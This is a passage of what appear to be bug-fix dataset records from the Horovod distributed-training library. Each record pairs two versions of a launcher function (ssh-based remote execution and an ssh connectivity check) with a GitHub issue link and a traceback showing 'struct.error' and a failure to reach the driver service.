File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
|
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _check_all_hosts_ssh_successful(host_addresses, ssh_port=None):
"""
checks if ssh can successfully be performed to all the hosts.
:param host_addresses: list of addresses to ssh into. for example,
['worker-0','worker-1']
['10.11.11.11', '10.11.11.12']
:type host_addresses: list(strings)
:return: Returns True if all ssh was successful into all the addresses.
"""
def exec_command(command):
exit_code = 1
output_msg = ""
# Try ssh 5 times
for i in range(SSH_ATTEMPTS):
output = io.StringIO()
try:
exit_code = safe_shell_exec.execute(
command, stdout=output, stderr=output
)
if exit_code == 0:
break
output_msg = output.getvalue()
finally:
output.close()
return exit_code, output_msg
ssh_port_arg = "-p {ssh_port}".format(ssh_port=ssh_port) if ssh_port else ""
ssh_command_format = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no"
" {host} {ssh_port_arg} true"
)
args_list = [
[ssh_command_format.format(host=host_address, ssh_port_arg=ssh_port_arg)]
for host_address in host_addresses
]
ssh_exit_codes = threads.execute_function_multithreaded(exec_command, args_list)
ssh_successful_to_all_hosts = True
for index, ssh_status in ssh_exit_codes.items():
exit_code, output_msg = ssh_status[0], ssh_status[1]
if exit_code != 0:
print(
"ssh not successful for host {host}:\n{msg_output}".format(
host=host_addresses[index], msg_output=output_msg
)
)
ssh_successful_to_all_hosts = False
if not ssh_successful_to_all_hosts:
return None # we could return False here but do not want it to be cached
return True
|
def _check_all_hosts_ssh_successful(host_addresses, ssh_port=None):
"""
checks if ssh can successfully be performed to all the hosts.
:param host_addresses: list of addresses to ssh into. for example,
['worker-0','worker-1']
['10.11.11.11', '10.11.11.12']
:type host_addresses: list(strings)
:return: Returns True if all ssh was successful into all the addresses.
"""
def exec_command(command):
exit_code = 1
output_msg = ""
# Try ssh 5 times
for i in range(SSH_ATTEMPTS):
output = io.StringIO()
try:
exit_code = safe_shell_exec.execute(
command, stdout=output, stderr=output
)
if exit_code == 0:
break
output_msg = output.getvalue()
finally:
output.close()
return exit_code, output_msg
ssh_port_arg = "-p {ssh_port}".format(ssh_port=ssh_port) if ssh_port else ""
ssh_command_format = "ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} date"
args_list = [
[ssh_command_format.format(host=host_address, ssh_port_arg=ssh_port_arg)]
for host_address in host_addresses
]
ssh_exit_codes = threads.execute_function_multithreaded(exec_command, args_list)
ssh_successful_to_all_hosts = True
for index, ssh_status in ssh_exit_codes.items():
exit_code, output_msg = ssh_status[0], ssh_status[1]
if exit_code != 0:
print(
"ssh not successful for host {host}:\n{msg_output}".format(
host=host_addresses[index], msg_output=output_msg
)
)
ssh_successful_to_all_hosts = False
if not ssh_successful_to_all_hosts:
exit(1)
return True
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _run_static(args):
all_host_names, _ = parse_hosts_and_slots(args.hosts)
nics_set = set(args.nics.split(",")) if args.nics else None
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
extra_mpi_args=args.mpi_args,
tcp_flag=args.tcp_flag,
binding_args=args.binding_args,
key=secret.make_secret_key(),
start_timeout=tmout,
num_proc=args.np,
hosts=args.hosts,
num_hosts=len(all_host_names),
output_filename=args.output_filename,
run_func_mode=args.run_func is not None,
nics=nics_set,
)
# This cache stores the results of checks performed by horovod
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
if not _check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
):
raise RuntimeError("could not connect to some hosts via ssh")
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
nics = driver_service.get_common_interfaces(
settings, all_host_names, remote_host_names, fn_cache
)
if args.run_func:
# get the driver IPv4 address
driver_ip = network.get_driver_ip(nics)
run_func_server = KVStoreServer(verbose=settings.verbose)
run_func_server_port = run_func_server.start_server()
put_data_into_kvstore(
driver_ip, run_func_server_port, "runfunc", "func", args.run_func
)
command = [
sys.executable,
"-m",
